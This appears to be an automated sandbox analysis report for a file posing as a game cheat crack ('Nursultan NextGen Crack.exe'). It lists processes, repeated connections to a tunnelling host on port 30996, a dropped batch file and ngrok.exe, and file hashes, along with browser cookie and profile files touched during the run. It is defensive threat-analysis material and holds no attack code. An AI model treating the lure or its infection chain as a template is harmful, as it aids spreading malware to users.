"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.2.822381599\1780858027" -childID 1 -isForBrowser -prefsHandle 3096 -prefMapHandle 3116 -prefsLen 24854 -prefMapSize 235380 -jsInitHandle 1060 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {033c922d-41fc-475c-a190-18a553c8529c} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 3128 236da82ab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.3.554853271\724390326" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 29448 -prefMapSize 235380 -jsInitHandle 1060 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10b0350b-461b-462f-87bf-6a8a740be6ff} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 3584 236dd459658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4756.4.428928837\106845635" -childID 3 -isForBrowser -prefsHandle 4768 -prefMapHandle 4764 -prefsLen 30263 -prefMapSize 235380 -jsInitHandle 1060 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f2bdfd9-6754-4e57-aaa2-69861af8917f} 4756 "\\.\pipe\gecko-crash-server-pipe.4756" 4780 236ded23258 tab

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004C0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa39b5855 /state1:0x41c64e6d

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 seems-poet.gl.at.ply.gg udp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
N/A 127.0.0.1:49830 tcp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.120.5.221:443 prod.pocket.prod.cloudops.mozgcp.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 44.240.188.8:443 shavar.services.mozilla.com tcp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
N/A 127.0.0.1:49837 tcp
GB 92.123.142.170:443 tcp
US 104.208.16.95:443 browser.pipe.aria.microsoft.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.200.14:443 apis.google.com udp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
GB 142.250.179.238:443 play.google.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.187.238:443 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 54.237.133.81:443 bin.equinox.io tcp
GB 92.123.142.170:443 tcp
GB 92.123.142.170:443 tcp
NL 23.62.61.160:443 www.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
BE 104.68.66.114:443 cxcs.microsoft.net tcp
NL 23.62.61.194:443 www.bing.com tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
GB 142.250.187.196:443 www.google.com tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
GB 142.250.187.196:443 www.google.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
N/A 127.0.0.1:50467 tcp
N/A 127.0.0.1:50480 tcp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.169.46:443 play.google.com tcp
GB 172.217.169.46:443 play.google.com udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
GB 142.250.187.238:443 consent.google.com tcp
GB 142.250.187.238:443 consent.google.com udp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com udp
GB 216.58.204.67:443 id.google.com tcp
GB 216.58.204.67:443 id.google.com udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.aida64.com udp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 172.64.150.190:443 static.mailerlite.com tcp
US 172.64.150.190:443 static.mailerlite.com udp
US 8.8.8.8:53 app.mailerlite.com udp
US 172.64.150.190:443 app.mailerlite.com tcp
US 8.8.8.8:53 190.150.64.172.in-addr.arpa udp
US 209.97.156.73:443 aida64.com tcp
US 172.64.150.190:443 app.mailerlite.com udp
US 209.97.156.73:443 aida64.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
GB 142.250.187.238:443 www3.l.google.com tcp
GB 142.250.187.238:443 www3.l.google.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.200.2:443 googleads.g.doubleclick.net tcp
GB 142.250.200.2:443 googleads.g.doubleclick.net tcp
GB 142.250.200.2:443 googleads.g.doubleclick.net tcp
GB 142.250.200.2:443 googleads.g.doubleclick.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 142.250.200.2:443 googleads.g.doubleclick.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 164.90.152.13:443 download2.aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 147.185.221.20:30996 seems-poet.gl.at.ply.gg tcp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 209.97.156.73:443 aida64.com tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 172.64.150.190:443 app.mailerlite.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 209.97.156.73:443 aida64.com tcp
US 172.64.150.190:443 app.mailerlite.com udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 172.64.150.190:443 app.mailerlite.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 172.64.150.190:443 app.mailerlite.com udp

Files

memory/3092-0-0x00007FFBE9C73000-0x00007FFBE9C75000-memory.dmp

memory/3092-1-0x0000000000340000-0x000000000037A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe

MD5 a9aee64b701db5f8cfc3c963872403b4
SHA1 48079f6822d84ea354f301cdb97d2ecb59552e06
SHA256 f46d7ae8973b42a0cb892c6aa8d6a559b4cc1d0c67b1d5df3072c4f7f77b53fb
SHA512 696e745d488841c3b1a55a350d754b69a1d6b0d83fd9eac247229239951b12bfd98d8cbbcbfffd567966495a10950040edd77398702763071f6eeb50f13a3a1e

memory/32-17-0x0000000000300000-0x0000000000326000-memory.dmp

C:\Users\Admin\AppData\Roaming\и.bat

MD5 9885bc1f632421f329efe28818361344
SHA1 9d0838fa885728361703a6e2b36e2aa3603b05ce
SHA256 6a218880f23edb2a809ee20919f355f80ef4a0b545c3d79ffa8c848441eced7a
SHA512 ddb5252457e9e02a91073f58662cd2eb72d670827f5173e8705c9e41d55a4ba4efdab80f24371ff61573d250f7b8463ce05f9cec7c48085dcacd38cd21e65203

memory/32-19-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_alvh1ln0.jry.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4800-25-0x000001BD7ECF0000-0x000001BD7ED12000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA1 9910190edfaccece1dfcc1d92e357772f5dae8f7
SHA256 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA512 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 df808b11175970c23f00e611a7b6d2cc
SHA1 0243f099e483fcafb6838c0055982e65634b6db6
SHA256 2d5eec6aeee0c568d08cc1777a67b529dce3133efc761ef4b4643d4b2003d43d
SHA512 c7c4e39be7cb6bfda48055cd2b0b05a6b6a71131a124730f62928600a5870303e06e3db54634c45f86310413126d2524f51002d5f36f7012e41b641992b5ac89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbed6207e0d3208bd0ee26b6c99307e3
SHA1 facbc3806e7596b021efd6a475cd407058223703
SHA256 631632aac60e6815fb18144cce66425db89b75c1e9d2c4af46d9d5148b6f5f72
SHA512 a0fbe5b0d32f20ffe23aebf00b77d41159ed7c01b2302efa6e6a0cc61e4c008538f44d2cf8c7ab6c062317d1c5762eebedf0d9a06a7fdde112d231f0a27fff8e

memory/32-63-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/32-64-0x000000001B130000-0x000000001B13C000-memory.dmp

memory/32-65-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/32-69-0x00007FFBE9C70000-0x00007FFBEA732000-memory.dmp

memory/32-83-0x0000000000C10000-0x0000000000C1A000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\activity-stream.discovery_stream.json.tmp

MD5 4fac4df8cd8f1fa19ca959be44a6139d
SHA1 dcccc715f9025010b956c0c4748f1d8b91221d27
SHA256 a144d21935d212069ee56bc143b2ba9c3a9aa99e3e38af7991c9b074b37a59c5
SHA512 0e4d502190821b6a0ff56da634a4421f00ec0b6ab76e2cd0aa647841f7be76bd5983854ab8d6c2476f79768dcd5c81b9896096f885757989ac8ca916c8d40e0f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

MD5 ec4a5494283c39c273ba709ce1ca05bc
SHA1 76ed79062fffd4de293837a1b8a078f498ad3746
SHA256 8d4cc915c85103a2de2b0d853c2ead502840ace8dc89da5357ef88d6993a48df
SHA512 e2acdc1be305577d1108182154d3ceba243ecf9abc233cfe4942821f561f07ab6ebd96a4cac7bdd53ddf278fa7810bec865814bf1a8d59b91229f92854d93106

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 08fdf017a23462824bea3ae3f6d9ff2a
SHA1 c83646f81c896d66974dcd0c07131702095c6d8e
SHA256 10d91d65b8c52d2119ca25c621ae2683b18260531b10387429a6f34ad8e4ad1a
SHA512 9b406062307b66949d778dd59bfaf7fb5d0f462fb11cd47c5f32907679656cd2ecc92e1b76bd5f04c1646efd8fe9fe08f81592fb0f69ca3d4141d0b343d6194e

\??\pipe\crashpad_3532_RYGQZKMEPPRXGKBI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/32-194-0x000000001BEF0000-0x000000001BF5A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 57c081f544a4eab3651509efcc0efece
SHA1 86e0ed6e5063f126d5b206fc12c025be106de089
SHA256 419f3d5c31fd387ce996349fce640ae4f0a3d4a198e01e3c904c2384df4c3470
SHA512 9b047fa8270f93e84fbce7df745eccb499babe40d387fd3cf91ae6510f6e9b8446e2e5efec5c0b1a46043b2b215c759bc684b6ee6863d86d4cd01e815865b771

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 5f2500986e45142b61a08078a034962d
SHA1 8cfc69e5be5dfa809231454b1129e0978887d416
SHA256 eed77b043e1a58da114ca75e724f71499e2005f795d71db7485f7492e9c2ed1c
SHA512 5354a8cd5816e3731754925f75f1e1fd5c88b54ff60497ccf7b94bcaa4d13a095caa273b1a8a7eab520ffcd7dc22be8da24587c67e34fbba0b8076e073c743eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 da1591b212d83663cc5dd04bf06fdb73
SHA1 e1f521fc68034bda75551aacc663f360ab1f19eb
SHA256 bd85832883d29878450efa56a5cad584d7e1a27e6cdbb21e9240393f78b897b3
SHA512 9a06ccbcaea78564b46da42d989e4f1881a3867654c340e37049b0da23a9df3e65cf3ea84c402a91b9a994908bfbf93bfc29361742ed9491ce6420093634932b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 be317221787cdf0bde25296cdf8c12d3
SHA1 31175c27dd0ccd46fb40a3c9ea6a84935ab885d4
SHA256 200ccb17dd84e70b4a6d81e3efea172fc2148b61625856cdaddbe61f216569c3
SHA512 24627213c7b3b553373385632670eadae64cf03c8662f9ee1c49ed241efc2a9200475e5907f9efe4d1d85d665fc8fd27d3915b6f8a3dfc393c7bbbc56db28171

C:\Users\Admin\AppData\Local\Temp\ngrok.exe

MD5 1e0a83fac6922bde341193e7085a6f33
SHA1 97dc81f5ae153951ed09ba30b106f31ee5054b00
SHA256 2295878561b60d1c5470bd23a4a49091620aad27dce4ad1ff63026d88a4c7944
SHA512 e4b2757b8940513a1fff35394ffd9a15acd40a3f4e5872a347cfd2da757d3a63adb48b73b22013794dd2192b06c507113e21183969d127b12e64576d89ce9b4e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 26694ec0035e877207a963c69311b570
SHA1 69f5f642d835237b8da7502a9a5d4a4e5c5a5a38
SHA256 89246f41f5d35a581dcd1f2d81f3b2169068b69e1a2dc4863eab06cc89fdba48
SHA512 b2e555d2ac8243f1a9c74f8434cf173465951450b7f88fbe29a4a958043c9ab6c45dbb11d5648e91189d8ff7561a0984694f0ccdcb2cd14a99c0ff4170eed9f3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

MD5 be0918e76cf79ba53171619062d7c52d
SHA1 410647acca4d4d41d28baafca7bbfe09ae7ff399
SHA256 66433e8ed05097f14db91d38f2262fa6397f2c5de63156c0ff82412923c0ed52
SHA512 848fbd6515e4ab6551df516427b11fb5b9fab032214a6d7cad43be153bea50b1416f34bdbedb01ff605011a96f1fcb4129459a7f364d2419f50d61718bbc8122

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c8c26d3b06202117736434f7c0d01739
SHA1 a6fdf7a38ccf63b28d829e9c109f1d224a1be2a2
SHA256 686d7fe61cf20a9a4ada4c2944555a519fdd68cd6ed9fa4751995cf3d35620b0
SHA512 943db8e121150659b5358702927ec9973c93c3fb7c7afce22cc4c6e2dfc268286193a24d3751405abff375883fada9db47e7195f887e921f2d0810f2106c0a0d

memory/32-284-0x000000001BDE0000-0x000000001BDEE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wininit.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 a7255a24bac979645a39768734450251
SHA1 06979647793b07aab4e17739cbce0f6587df502a
SHA256 fb24e357ebaa43cd31a1ea30bc93f1dfbc58dc69dda699a6bc4f9a2cfcbae1b4
SHA512 6aab3bee9ca9e0ecce7b988295b409614c869c1d75f82329392c6eb65e5229bc657a5d75c685cb802fa104add181e3891f9e959f7acad9eacd85abb1510ad10f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59479e.TMP

MD5 e36e01f2419b684dce256ea00afa0eec
SHA1 23e79f7b3b3b9086570a11b2a6a6bafc9eba6841
SHA256 2271396e999c47d105cde6e10829d4e30050eb00e71d14718d8f59d68287c0d5
SHA512 6a9d57c943f3f2a7ee5a0145f97223454bcbb22004b943a98bf56786ef11e2138b4ba44dfb43374646aa0c210d21fb7274f6086d4ba071dae34a52dc28a329a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 1eed103fc1f53973b95d9e81c4ca6be7
SHA1 42819ddd4063f3f304039c5231619e0775bcc05f
SHA256 ee8a4b9ef3008a08d7f7c7b9d1ac1448bb48cea4d87e7627fb54963575c886fc
SHA512 71998ad527f863bb9b8e834d683ceaed6c3def32536f0bfa275d6300af132bdef80c96ce8d455ef99d4edd7e61ac4d248b913e7146db717980aec84425fc46fc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 0c1c2a90fec6866a815d5e635fe3139d
SHA1 5256860c862f5e9075a978b7d2813b8651ca9cfc
SHA256 a7d4c600176462eba83010099537d78b4db3f5a26a5c6df8d0f2f00b562057ab
SHA512 8dee7366b8613c84dc186ac74232cb3f4ad5ec6355bfc9ef35bd458204507a8c8659b6af3f7a2e59cfd10ffcb46ae4d10c1585f210caf7af72ea2f5b3a68dd1c

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-6-25.1247.5604.1.odl

MD5 f9a9467ffd0f730c146233b0e382990e
SHA1 2f0be10d9b77fbf37b97ac0c01035ea7357b74b7
SHA256 9bcb836125dbaabb19b017ce62286be9e9836979e05c3e5d956a0517735baf00
SHA512 39a717ddc4bfbcaf24f2495d77d96205550871b42753b157184b6cea75728291eac3fbe74c2eafa5ca72d33594b01556440ec20d10bb3b3e72a5d5e8a881646d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8b37d47abb4566ede790c698beb19cd0
SHA1 131409652999c402d476af0327fbefa7db36fd9a
SHA256 d9b438435514d7783998b58000943f73ee80e2d38a124ecd79fb2304ecbe83a6
SHA512 89f88c0c2b27b82c6287a12f15bc10e38a5e9d72ff8b5879a31d4a6c5f615b435458065f9c18f855993c7d4ea0593fb24d6f2e458f1b3100b7514dfdadc8f126

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-6-25.1248.5444.1.odl

MD5 408602647f7c398738a92b5fa74e8cf3
SHA1 d84892d126e0ce3881c20bec9c3278f3aa4dc6ed
SHA256 b2fded97caa0a9c42a3f81362b62637299f99ea6c05b991ddb48b96744b78f52
SHA512 1a1165a927749cdd22185c7270a5ae18161b207e8612b79ed405db920bd455ff12fed92d387c7a7e0bbbeb201ecebaf9293350fd91a37602843cdb05ef0c66c4

memory/32-394-0x000000001B670000-0x000000001B6FE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d7c1fda2a796ae177b6cb010df9c73aa
SHA1 032a70475c6dd4e9b309e65484c85b1c802be2a1
SHA256 f2d3d3529bd58fa1de475117abe263ece70ca0d384172c150155b78ed898c26c
SHA512 0edd1cd1f2991a94c7a87195a05d5b4c89b4c05eb9e03c45a45be315e0ff2693f115c2c3a0b3cee3ca14f47b09a194f60aa11a990120bce59c4134f9407eccc1

memory/32-458-0x000000001B5E0000-0x000000001B5ED000-memory.dmp

memory/32-459-0x000000001B5F0000-0x000000001B60E000-memory.dmp

memory/32-460-0x000000001B610000-0x000000001B61B000-memory.dmp

memory/32-456-0x000000001B560000-0x000000001B5A6000-memory.dmp

memory/32-457-0x000000001B5B0000-0x000000001B5B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore-backups\recovery.jsonlz4

MD5 fedf194cef7c24ef87148d397626f230
SHA1 e8e0bb444827612f9290a5665a7f3b1b819cc49d
SHA256 72c91c8559391918279b4ba7f9652430300d42565669b0b9e6044a78f4079f88
SHA512 f50011c2f9e047eb0731f64d5dc475909a0490fc4fb2ba9dde8807779f9420ff2db0944245629e58e2feaf83dff83799d6e1c2acd3b84effe82429e7b1749700

memory/32-476-0x000000001B560000-0x000000001B5A6000-memory.dmp

memory/32-494-0x000000001B640000-0x000000001B64A000-memory.dmp

memory/32-515-0x000000001B700000-0x000000001B70A000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\entries\C6A6389A9162CEB2E1F41436B370871FECA58F75

MD5 791e70f7a0e2803c14cbb9cced27ffe9
SHA1 ac80e33b0f74351c0ff889b0f7f6c127e659241f
SHA256 041a988dfb06aedd40dde09ac11a235979635d3d86edf1518146ca00c6789cf0
SHA512 32ac8972e3e1cdb763d2730c948d7a4b7b841753c5cebf4fee692f9566d0d4b6a79cb016a915547ef53daccc25a335c96d0a914f243cb1f002ab7c0a8d31b5a5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cache2\doomed\11919

MD5 9804ab1ae2c3657d272fc086727513e6
SHA1 518d7045ff2e7cea5634880b2a89719fb8356e0a
SHA256 206ee37b5af43b3c2bc2ce3141b3b2edd3a979a8603ad913efeced651a5d9f12
SHA512 9a0d2a0be5427d000a424fd5d3695f8c41a58bb95b4229a904fb576c7f9afdce2da53f03b83320e9340beb05d959e9af252d05b06b315e2cc18e5a29c8c14a83

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\sessionstore.jsonlz4

MD5 6a4911c38b9a0fca2ab5d6f84e0580aa
SHA1 5141390db053042e7b9cab76613c2287a2dbef69
SHA256 fe84e5b02084038356f08ea92b5288ac7461527d47755fc9bbfb04ca6d152059
SHA512 0bd48700c3dcb89889336f58dc2432635c2ad5c0e190ad0e4c992f70647ad931257ce98bdf77351f20eed2dbc9e2cebdc367efe1d4cbe1f79e7e05e26564f013

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\prefs-1.js

MD5 901d7eff12b9f371fceb8ff312737baf
SHA1 793139a6de6271d8cb959cd4d0427f73d1a68830
SHA256 2dc275d572c019a4539a06cb5f1e8037fc414c5b6896a673e798d799bae230df
SHA512 3d360ca56049b0bf813b8a75d7f12b533607b94ef7890b72229fdc0f4e7de447072c01a7bf9cda12b79f4366edf9790abdac9ff00d395d5675bd67b5e6db78a6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\xulstore.json

MD5 6d9b95ac26c346f90f4773f7653b89b7
SHA1 7fc448b63abe6b9c8549543a7e7a7dde53ff2736
SHA256 e881d3d030d2427dd30d05df4e5bf1494af4e14c5440e20772757dd197626d46
SHA512 6ee6ca9770956cf67db93a19864cc08b082f3f293510b60b2888b29995a2a296e5dfb06f46e6b2cebb328a7342044092f1444c5ce231284bf5f5e7e8cc68357f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bov3gdb6.default-release\startupCache\urlCache.bin

MD5 5e011334252036cd17e98871e3a2d5b3
SHA1 2d65c742cecd3e9b8744535a7bb71a23f0093c7a
SHA256 eec2012b0eabbe9c96538c7be02488c7645dca8af3018ae85253f8996ae9829d
SHA512 375ac8faee0c00a80d773cb00def9f5864813de7d310ac981d0487a8677e81e0c5dc9d3f26fe5dd68ff79b37cafc848c089f2224f979a3c80a4df6a23de24e6b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\permissions.sqlite

MD5 71a7a3863a0ab00bc0ea3c958df99a66
SHA1 aaf50a5c4ade39e78fd32eca3e2d9d0e1888437d
SHA256 fe4ef3ec9c44e17f0d7cd0cabf1a7637b539c8f3601be30d92375dced0dddf63
SHA512 f8fc413df88a4890363b86b3ad1660e9041a49911655c4c8ca12e6835bcba8387b2a5557cd9225452726ce3e65200a2ecc45d6c45a3bf38ddf4860dd468f980a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bov3gdb6.default-release\cookies.sqlite

MD5 e2cfd149496b1df0cbf49c30097c95b0
SHA1 74a527d3a21e9020b2cce953a85a7f3971549df8
SHA256 25e5ed645e257070269d388f427d85038899a3d2cc4a11d3505c661a0e9cf574
